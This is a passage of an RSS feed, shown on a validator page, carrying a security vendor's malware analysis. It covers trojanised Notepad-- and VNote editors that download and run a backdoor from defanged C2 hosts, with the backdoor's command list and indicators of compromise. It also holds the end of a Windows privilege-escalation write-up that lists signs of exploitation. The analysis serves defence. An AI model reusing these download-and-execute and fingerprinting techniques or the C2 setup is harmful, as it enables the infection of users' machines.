  1710. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112257" src="" alt="" width="959" height="408" srcset=" 959w, 300w, 768w, 823w, 740w, 658w, 800w" sizes="(max-width: 959px) 100vw, 959px" /></a></p>
  1711. <p>ObpLookupObjectName checks FileObjectType followed by a call to ObpUseSystemDeviceMap.</p>
  1712. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112258" src="" alt="" width="741" height="585" srcset=" 741w, 300w, 443w, 355w" sizes="(max-width: 741px) 100vw, 741px" /></a></p>
  1713. <p>The ObpUseSystemDeviceMap function checks for the SystemDevice to be used instead of the impersonated device.</p>
  1714. <h2 id="how-to-check-if-a-vulnerability-was-exploited-or-any-attempts-were-made-to-exploit-it">How to check if a vulnerability was exploited or any attempts were made to exploit it?</h2>
  1715. <p>When analyzing most of the exploits targeting this attack surface, we observed a common behavior that could be used as an indicator of whether there were any attempted exploits:</p>
  1716. <ul>
  1717. <li>Most of the in-the-wild exploits create a writable folder inside the C:\ drive, and the structure of this folder mimics the structure of the original C:\ drive, for example:
  1718. <ul>
  1719. <li><strong>C:\Windows\System32</strong> → C:\FakeFolder\Windows\System32</li>
  1720. <li><strong>C:\Windows\WinSxS </strong>→ C:\FakeFolder\Windows\WinSxS</li>
  1721. </ul>
  1722. </li>
  1723. <li>So finding a writable folder that mimics the C:\ drive folder structure may be an indicator of an exploitation attempt.</li>
  1724. <li>Copying the manifest files from the original WinSxS folder in <strong>C:\Windows\WinSxS</strong> to a writable directory and modifying them could be a good indicator of an exploitation attempt.</li>
  1725. <li>Manifest files that contain undocumented XML attributes such as <strong>&#8220;LoadFrom&#8221;</strong> or manifest files that contain path traversal in the <strong>&#8220;name&#8221;</strong> attribute could be a valid sign of an exploitation attempt.</li>
  1726. <li>Creating a symbolic link from the original system drive to a writable directory, especially from processes with medium integrity using the <strong>\RPC Control\ </strong>object directory.</li>
  1727. </ul>
  1728. ]]></content:encoded>
  1729. <wfw:commentRss></wfw:commentRss>
  1730. <slash:comments>1</slash:comments>
  1731. <media:content xmlns:media="" url="" width="1200" height="600"><media:keywords>full</media:keywords></media:content>
  1732. <media:content xmlns:media="" url="" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1733. <media:content xmlns:media="" url="" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1734. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1735. </item>
  1736. <item>
  1737. <title>What&#8217;s in your notepad? Infected text editors target Chinese users</title>
  1738. <link></link>
  1739. <comments></comments>
  1740. <dc:creator><![CDATA[Sergey Puzan]]></dc:creator>
  1741. <pubDate>Wed, 13 Mar 2024 11:29:43 +0000</pubDate>
  1742. <category><![CDATA[Malware descriptions]]></category>
  1743. <category><![CDATA[Apple MacOS]]></category>
  1744. <category><![CDATA[Backdoor]]></category>
  1745. <category><![CDATA[Linux]]></category>
  1746. <category><![CDATA[Malware]]></category>
  1747. <category><![CDATA[Malware Descriptions]]></category>
  1748. <category><![CDATA[Malware Technologies]]></category>
  1749. <category><![CDATA[Trojan]]></category>
  1750. <category><![CDATA[Unix and macOS malware]]></category>
  1751. <guid isPermaLink="false"></guid>
  1753. <description><![CDATA[Infected versions of the text editors VNote and Notepad&#8208;&#8208; for Linux and macOS, apparently loading a backdoor, are being distributed through a Chinese search engine.]]></description>
  1754. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>&#8220;Malvertising&#8221; is a popular way of attracting victims to malicious sites: an advertisement block is placed at the top of the search results, increasing the likelihood of users clicking the link. Sites at the top of search results also tend to be more trusted by users. A year ago, our experts <a href="" target="_blank" rel="noopener">discussed</a> a malvertising campaign that spread the <strong>RedLine</strong> stealer via Google Ads. Using <a href=";utm_medium=blog&amp;utm_campaign=termin-explanation" target="_blank" rel="noopener">typosquatting</a> and other techniques, the attackers tried to make their resources look as similar as possible to the official websites of popular programs.</p>
  1755. <p>This time, a similar threat has affected users of one of the most popular search engines in the Chinese internet. We&#8217;ve discovered two related cases where modified versions of popular text editors were distributed in this system: in the first case, the malicious resource appeared in the advertisement section; in the second case, at the top of the search results. We have not yet been able to establish all the details of the threat, so this material may be updated later.</p>
  1756. <h2 id="malicious-sites-in-search-results">Malicious sites in search results</h2>
  1757. <p>The screenshots below show two searches which the search engine responds to with malicious links:</p>
  1758. <div id="attachment_112169" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112169" class="size-large wp-image-112169" src="" alt="Malicious link in the advertisement section for the search notepad++ (left) and search results for vnote (right)" width="1024" height="352" srcset=" 1024w, 300w, 768w, 1018w, 740w, 814w, 800w, 1428w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112169" class="wp-caption-text">Malicious link in the advertisement section for the search notepad++ (left) and search results for vnote (right)</p></div>
  1759. <p>The malicious site found in the <strong>notepad++</strong> search is distributed through an advertisement block. Opening it, an attentive user will immediately notice an amusing inconsistency: the website address contains the line <strong>vnote</strong>, the title offers a download of <strong>Notepad&#8208;&#8208;</strong> (an analog of <strong>Notepad++</strong>, also distributed as open-source software), while the image proudly shows <strong>Notepad++</strong>. In fact, the packages downloaded from here contain <strong>Notepad&#8208;&#8208;</strong>.</p>
  1760. <div id="attachment_112170" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112170" class="size-large wp-image-112170" src="" alt="Page with fake NotePad++" width="1024" height="518" srcset=" 1024w, 300w, 768w, 692w, 740w, 553w, 800w, 1429w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112170" class="wp-caption-text">Page with fake NotePad++</p></div>
  1761. <p>This site offers installers for three popular platforms (Windows, Linux, macOS); however, there are only two malicious links here, leading to download pages for the macOS and Linux versions. The link to the Windows version leads to the official repository and is not malicious:</p>
  1762. <div id="attachment_112171" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112171" class="size-large wp-image-112171" src="" alt="Application download links, linked to buttons on the malicious Notepad-- download page" width="1024" height="206" srcset=" 1024w, 300w, 768w, 740w, 1395w, 800w, 1420w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112171" class="wp-caption-text">Application download links, linked to buttons on the malicious Notepad&#8208;&#8208; download page</p></div>
  1763. <p>The screenshot shows that the source of the malicious installation packages is the resource <strong>vnote-1321786806[.]cos[.]ap-hongkong[.]myqcloud[.]com</strong>.</p>
  1764. <p>Meanwhile, the second page, found in the <strong>vnote</strong> search, tries to imitate the official website of the program:</p>
  1765. <div id="attachment_112172" style="width: 1018px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112172" class="size-large wp-image-112172" src="" alt="Fake (above) and the original (below) VNote site" width="1008" height="1024" srcset=" 1008w, 295w, 768w, 344w, 740w, 276w, 800w, 50w, 1427w" sizes="(max-width: 1008px) 100vw, 1008px" /></a><p id="caption-attachment-112172" class="wp-caption-text">Fake (above) and the original (below) <strong>VNote</strong> site</p></div>
  1766. <p>Unfortunately, at the time of this investigation, the links to the potentially malicious versions of <strong>VNote</strong> were no longer functioning; however, they led to the same resource as the <strong>Notepad&#8208;&#8208;</strong> links:</p>
  1767. <div id="attachment_112173" style="width: 947px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112173" class="size-full wp-image-112173" src="" alt="Application download links, linked to buttons on the fake VNote site" width="937" height="390" srcset=" 937w, 300w, 768w, 841w, 740w, 673w, 800w" sizes="(max-width: 937px) 100vw, 937px" /></a><p id="caption-attachment-112173" class="wp-caption-text">Application download links, linked to buttons on the fake VNote site</p></div>
  1768. <h2 id="text-editor-with-malicious-payload">Text editor with malicious payload</h2>
  1769. <p>Since we have samples of the fake <strong>Notepad&#8208;&#8208; </strong>for Linux and macOS, we can take a closer look at them.</p>
  1770. <p>The downloaded applications have several differences from the original versions, and the malicious Linux and macOS versions are similar in functionality. Next, we will examine the macOS version (<em>MD5: 00fb77b83b8ab13461ea9dd27073f54f</em>). It is a disk image in DMG format, whose contents are identical to the original (version 2.0.0), except for the executable file itself, named NotePad&#8208;&#8208; (<em>MD5: 6ace1e014863eee67ab1d2d17a33d146</em>).</p>
  1771. <p>Studying the contents of its <strong>main</strong> function, we discovered that just before the application is launched, the suspicious class <strong>Uplocal</strong> is initialized, which is absent in the source code of the original Notepad&#8208;&#8208;:</p>
  1772. <div id="attachment_112174" style="width: 486px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112174" class="size-full wp-image-112174" src="" alt="Modified section of code before application launch" width="476" height="226" srcset=" 476w, 300w" sizes="(max-width: 476px) 100vw, 476px" /></a><p id="caption-attachment-112174" class="wp-caption-text">Modified section of code before application launch</p></div>
  1773. <p>This class implements only one method named <strong>run</strong>. Its purpose is to download a file to the path <strong>/tmp/updater</strong> and execute it:</p>
  1774. <div id="attachment_112175" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112175" class="size-large wp-image-112175" src="" alt="Payload of the run method of the Uplocal class" width="1024" height="430" srcset=" 1024w, 300w, 768w, 833w, 740w, 667w, 800w, 1464w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112175" class="wp-caption-text">Payload of the run method of the Uplocal class</p></div>
  1775. <p>The file is downloaded from the address <strong>hxxp://update[.]transferusee[.]com/onl/mac/&lt;md5_hash&gt;</strong>, where <strong>&lt;md5_hash&gt;</strong> is the MD5 hash of the device&#8217;s serial number obtained in the <strong>GetComputerUUID</strong> function by executing the following bash command:</p><pre class="crayon-plain-tag">ioreg -rd1 -c IOPlatformExpertDevice |  awk '/IOPlatformSerialNumber/ { print $3; }'</pre><p>
  1776. The Linux version differs slightly:</p>
  1777. <ol>
  1778. <li>The file is downloaded from the same address, but is located in the directory /onl/lnx/: <strong>hxxp://update[.]transferusee[.]com/onl/lnx/&lt;md5_hash&gt;</strong></li>
  1779. <li><strong>&lt;md5_hash&gt;</strong> is the MD5 hash of the device&#8217;s MAC address:
  1780. <div id="attachment_112176" style="width: 480px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112176" class="size-full wp-image-112176" src="" alt="Obtaining and hashing the device's MAC address" width="470" height="508" srcset=" 470w, 278w, 324w, 259w" sizes="(max-width: 470px) 100vw, 470px" /></a><p id="caption-attachment-112176" class="wp-caption-text">Obtaining and hashing the device&#8217;s MAC address</p></div></li>
  1781. </ol>
  1782. <p>Unfortunately, at the time of our investigation, the downloaded file was no longer available on the server, and we couldn&#8217;t determine what was supposed to be there.</p>
  1783. <p>However, we know for sure that this server has another subdomain, <strong>dns[.]transferusee[.]com</strong>, and it is accessed by a Mach-O file named <strong>DPysMac64</strong> (<em>MD5: 43447f4c2499b1ad258371adff4f503f</em>), previously uploaded to VT and not detected by any vendor at the time of the investigation:</p>
  1784. <div id="attachment_112177" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112177" class="size-large wp-image-112177" src="" alt="DPysMac64 file page on VT" width="1024" height="663" srcset=" 1024w, 300w, 768w, 1536w, 541w, 740w, 433w, 800w, 1881w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112177" class="wp-caption-text">DPysMac64 file page on VT</p></div>
  1785. <p>Moreover, this file is stored on the same server from which the mysterious <strong>updater</strong> was supposed to be downloaded:</p>
  1786. <div id="attachment_112178" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112178" class="size-large wp-image-112178" src="" alt="Loading DPysMac64 from update[.]transferusee[.]com" width="1024" height="144" srcset=" 1024w, 300w, 768w, 740w, 800w, 1431w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112178" class="wp-caption-text">Loading DPysMac64 from update[.]transferusee[.]com</p></div>
  1787. <p>From this, we can fairly confidently assume that the <strong>updater</strong> is an intermediate step that should ultimately lead to loading <strong>DPysMac64</strong>. The server also contains a file called <strong>DPysMacM1</strong>, the name of which implies that it is built for systems running on Apple Silicon processors; however, in reality, it is the same file as <strong>DPysMac64</strong>.</p>
  1788. <p>The application is a backdoor, very similar to the so-called <strong>Geacon</strong> – an open-source implementation of the <strong>CobaltStrike</strong> agent written in Go. Although the attackers removed any direct mention of <strong>Geacon</strong> from their project, we found a large number of lines, names, and code fragments of functions and modules matching implementations of <a href="" target="_blank" rel="noopener"><strong>geacon_plus</strong></a>, <strong>geacon_pro</strong>, and <a href="" target="_blank" rel="noopener"><strong>BeaconTool</strong></a>. For example, they have almost completely identical <strong>sysinfo</strong> modules, functions <strong>FirstBlood</strong>, <strong>EncryptedMetaInfo</strong>, <strong>PullCommand</strong>, and so on:</p>
  1789. <div id="attachment_112179" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112179" class="size-large wp-image-112179" src="" alt="Comparison of the list of functions of the sysinfo module of DPysMac64 (left) and an instance of geacon_pro (right)" width="1024" height="243" srcset=" 1024w, 300w, 768w, 740w, 800w, 1143w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112179" class="wp-caption-text">Comparison of the list of functions of the <strong>sysinfo</strong> module of DPysMac64 (left) and an instance of geacon_pro (right)</p></div>
  1790. <p>The backdoor has two launch options – normal and as a service. Communication with the C2 server <strong>dns[.]transferusee[.]com</strong> is carried out via HTTPS protocol. Interestingly, the attackers named the project which implements the functionality of executing remote commands <strong>spacex</strong>:</p>
  1791. <div id="attachment_112180" style="width: 658px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112180" class="size-full wp-image-112180" src="" alt="The name of the backdoor module contained in the lines of the DPysMac64 file" width="648" height="448" srcset=" 648w, 300w, 506w, 405w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112180" class="wp-caption-text">The name of the backdoor module contained in the lines of the DPysMac64 file</p></div>
  1792. <p>The backdoor contains the following list of commands:</p>
  1793. <table width="100%">
  1794. <tbody>
  1795. <tr>
  1796. <td width="10%"><strong>Code</strong></td>
  1797. <td width="30%"><strong>Name</strong></td>
  1798. <td width="60%"><strong>Purpose</strong></td>
  1799. </tr>
  1800. <tr>
  1801. <td>25</td>
  1802. <td>CmdSSH</td>
  1803. <td>Creating an SSH connection</td>
  1804. </tr>
  1805. <tr>
  1806. <td>27</td>
  1807. <td>Spawn</td>
  1808. <td>Launching a new agent</td>
  1809. </tr>
  1810. <tr>
  1811. <td>32</td>
  1812. <td>CmdExit</td>
  1813. <td>Shutdown</td>
  1814. </tr>
  1815. <tr>
  1816. <td>34</td>
  1817. <td>SetSleep</td>
  1818. <td>Entering sleep mode</td>
  1819. </tr>
  1820. <tr>
  1821. <td>1010</td>
  1822. <td>Screenshot</td>
  1823. <td>Taking a screenshot</td>
  1824. </tr>
  1825. <tr>
  1826. <td>1020</td>
  1827. <td>ProcessList</td>
  1828. <td>Getting a list of processes</td>
  1829. </tr>
  1830. <tr>
  1831. <td>1021</td>
  1832. <td>ProcessKill</td>
  1833. <td>Terminating a process</td>
  1834. </tr>
  1835. <tr>
  1836. <td>1030</td>
  1837. <td>PortScan</td>
  1838. <td>Scanning ports</td>
  1839. </tr>
  1840. <tr>
  1841. <td>1031</td>
  1842. <td>Install</td>
  1843. <td>Adding itself to the list of services</td>
  1844. </tr>
  1845. <tr>
  1846. <td>1032</td>
  1847. <td>UnInstall</td>
  1848. <td>Removing itself from the list of services</td>
  1849. </tr>
  1850. <tr>
  1851. <td>1040</td>
  1852. <td>CmdHashdump</td>
  1853. <td>Getting the computer name</td>
  1854. </tr>
  1855. <tr>
  1856. <td>1044</td>
  1857. <td>CmdClipboard</td>
  1858. <td>Reading clipboard content</td>
  1859. </tr>
  1860. <tr>
  1861. <td>1050</td>
  1862. <td>FileBrowse</td>
  1863. <td>Getting a list of files in a directory</td>
  1864. </tr>
  1865. <tr>
  1866. <td>1051</td>
  1867. <td>FileDrives</td>
  1868. <td>Getting a list of drives</td>
  1869. </tr>
  1870. <tr>
  1871. <td>1052</td>
  1872. <td>FileMakeDir</td>
  1873. <td>Creating a directory</td>
  1874. </tr>
  1875. <tr>
  1876. <td>1056</td>
  1877. <td>FileUpload</td>
  1878. <td>Uploading a file to the server</td>
  1879. </tr>
  1880. <tr>
  1881. <td>1057</td>
  1882. <td>FileExecute</td>
  1883. <td>Executing a file</td>
  1884. </tr>
  1885. <tr>
  1886. <td>1060</td>
  1887. <td>FileDownload</td>
  1888. <td>Downloading a file from the server</td>
  1889. </tr>
  1890. </tbody>
  1891. </table>
  1892. <h2 id="connection-between-infected-applications">Connection between infected applications</h2>
  1893. <p>While we cannot be certain about the files previously downloaded from <strong>vnote[.]info</strong>, we have discovered that the sources distributing applications on both sites are the same. It&#8217;s also worth mentioning another interesting detail that we found completely by chance during the examination of the modified <strong>NotePad&#8208;&#8208;</strong>. In the lines of the executable file, we found text resembling an <strong>About</strong> window, but instead of a link to the official project website, it contained a link to the suspicious resource <strong>vnotepad[.]com</strong>. Below is a screenshot of the <strong>About</strong> window in the program&#8217;s user interface:</p>
  1894. <div id="attachment_112181" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112181" class="size-large wp-image-112181" src="" alt="About window of modified Notepad--" width="1024" height="580" srcset=" 1024w, 300w, 768w, 618w, 740w, 494w, 800w, 1456w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112181" class="wp-caption-text">About window of modified Notepad&#8208;&#8208;</p></div>
  1895. <p>The link in the <strong>About</strong> window led us to a stub page:</p>
  1896. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" src="" alt="" width="2298" height="542" class="aligncenter size-full wp-image-112235" srcset=" 2298w, 300w, 1024w, 768w, 1536w, 2048w, 1484w, 740w, 1187w, 800w" sizes="(max-width: 2298px) 100vw, 2298px" /></a></p>
  1897. <p>We found it strange, so we tried to switch from HTTP to HTTPS, which made it possible to discover that this site is another copy of the <strong>VNote</strong> site, similar to the one we saw on <strong>vnote[.]info</strong>. Furthermore, when opening this site, the browser warned us that the certificate it was using was invalid because it was issued for <strong>vnote[.]info</strong>:</p>
  1898. <div id="attachment_112182" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112182" class="size-large wp-image-112182" src="" alt="Certificate used by the site vnotepad[.]com" width="1024" height="453" /></a><p id="caption-attachment-112182" class="wp-caption-text">Certificate used by the site vnotepad[.]com</p></div>
  1899. <p>This indicates a definite connection between the two cases described, as well as the high probability that the purpose of the modified <strong>VNote</strong> editors is similar to that of <strong>NotePad&#8208;&#8208;</strong>, and involves delivering the next stage of infection.</p>
  1900. <h2 id="conclusion">Conclusion</h2>
  1901. <p>We&#8217;re continuing to study the threat described above and are searching for intermediate stages that have not yet been discovered. In addition, we&#8217;ve established that the changes in the Linux and macOS applications are identical, suggesting the possibility of a backdoor for Linux that is similar to the one we found for macOS.</p>
  1902. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1903. <p><strong>Files:</strong></p>
  1904. <table width="100%">
  1905. <tbody>
  1906. <tr>
  1907. <td width="40%"><strong>MD5</strong></td>
  1908. <td width="20%"><strong>File type</strong></td>
  1909. <td width="40%"><strong>File name</strong></td>
  1910. </tr>
  1911. <tr>
  1912. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">43447f4c2499b1ad258371adff4f503f</a></td>
  1913. <td>Mach-O 64-bit</td>
  1914. <td>DPysMac64</td>
  1915. </tr>
  1916. <tr>
  1917. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">00fb77b83b8ab13461ea9dd27073f54f</a></td>
  1918. <td>DMG</td>
  1919. <td>Notepad&#8208;&#8208;v2.0.0-mac_x64_12.3.dmg</td>
  1920. </tr>
  1921. <tr>
  1922. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5ece6281d57f16d6ae773a16f83568db</a></td>
  1923. <td>AppImage</td>
  1924. <td>Notepad&#8208;&#8208;-x86_64.AppImage</td>
  1925. </tr>
  1926. <tr>
  1927. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6ace1e014863eee67ab1d2d17a33d146</a></td>
  1928. <td>Mach-O 64-bit</td>
  1929. <td>NotePad&#8208;&#8208;</td>
  1930. </tr>
  1931. <tr>
  1932. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">47c9fec1a949e160937dd9f9457ec689</a></td>
  1933. <td>ELF 64-bit</td>
  1934. <td>NotePad&#8208;&#8208;</td>
  1935. </tr>
  1936. </tbody>
  1937. </table>
  1938. <p><strong>Links:</strong></p>
  1939. <table width="100%">
  1940. <tbody>
  1941. <tr>
  1942. <td width="100%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dns[.]transferusee[.]com</a></td>
  1943. </tr>
  1944. <tr>
  1945. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/onl/mac/</a></td>
  1946. </tr>
  1947. <tr>
  1948. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/onl/lnx/</a></td>
  1949. </tr>
  1950. <tr>
  1951. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/DPysMac64</a></td>
  1952. </tr>
  1953. <tr>
  1954. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/DPysMacM1</a></td>
  1955. </tr>
  1956. <tr>
  1957. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnote[.]info</a></td>
  1958. </tr>
  1959. <tr>
  1960. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnote[.]fuwenkeji[.]cn</a></td>
  1961. </tr>
  1962. <tr>
  1963. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnotepad[.]com</a></td>
  1964. </tr>
  1965. <tr>
  1966. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnote-1321786806[.]cos[.]ap-hongkong[.]myqcloud[.]com</a></td>
  1967. </tr>
  1968. </tbody>
  1969. </table>
  1970. ]]></content:encoded>
  1971. <wfw:commentRss></wfw:commentRss>
  1972. <slash:comments>0</slash:comments>
  1973. <media:content xmlns:media="" url="" width="1200" height="600"><media:keywords>full</media:keywords></media:content>
  1974. <media:content xmlns:media="" url="" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1975. <media:content xmlns:media="" url="" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1976. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1977. </item>
  1978. </channel>
  1979. </rss>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid RSS" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda